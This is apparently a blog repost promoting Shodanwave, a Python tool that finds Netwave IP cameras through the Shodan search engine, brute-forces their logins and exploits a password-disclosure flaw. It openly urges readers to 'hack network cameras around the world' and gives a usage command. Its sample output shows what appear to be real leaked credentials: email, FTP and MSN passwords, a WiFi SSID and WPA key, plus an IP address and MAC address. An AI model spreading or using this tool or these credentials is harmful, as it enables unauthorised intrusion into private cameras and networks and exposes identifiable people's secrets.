Shodanwave – Explore & Obtain Information from Netwave IP Camera

Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online but not only that.

Hack network cameras around the world, Very fun!

What does the tool to? Look, a list!

Search

Brute force

SSID and WPAPSK Password Disclosure

E-mail, FTP, DNS, MSN Password Disclosure

Exploit

Here is an example of shodan wave running and showing the full output…

Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key python shodanwave.py –help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __//____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan serviceInformation the use of this tool is illegal, not bad.[+] Shodan successfully Connected.[+] Shodan Exploit Enabled.[+] Netwave IP Camera Found: 111307[+] Passwords loaded: 12[!] Disable password discovery module? (Yes/no): Yes[+] Password Found admin@123456[!] Trying to get more information[+] Email: basile.antonio@orange.fr:vitaline19[+] FTP: ftp://basile.an1tonio.perso.sfr.fr:vitalineD519@http://ftpperso.sfr.fr/:21%5B+%5D MSN: camera-rousselin1@hotmail.fr@vitaline19[!] Getting System Information[!] Getting Wireless System Information[+] Mac address found E8ABFA1A9374[+] Host: http://186.193.55.18:8080%5B+%5D Country: n/a[+] Organization: Nettel Telecomunicaçþes Ltda.[+] Product: Netwave IP camera http config[+] SSID: moslekok[+] WPAPSK: TulSokanLoptatok[+] Starting to read memory dump.. this could take a few minutes[+] CTRL+C to exit..[+] Binary data: 70560[+] Strings in binary data found.. password should be around line 10000[+] Mac address triggered.. printing the following dumps, could leak username and passwords..[+] Firstline… CAMERA2[+] Possible username: admin[+] Possible password: ac00310[+] Following line..

Install Requirements

pip install -r /path/to/requirements.txt

You need the API key to run. You can get a key free on http://ift.tt/2uecnzi:

Shodan API search engine for Internet-connected devices.

Requests Requests: HTTP for Humans

Netwave Exploit Netwave IP Camera – Password Disclosure

Download Shodanwave

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s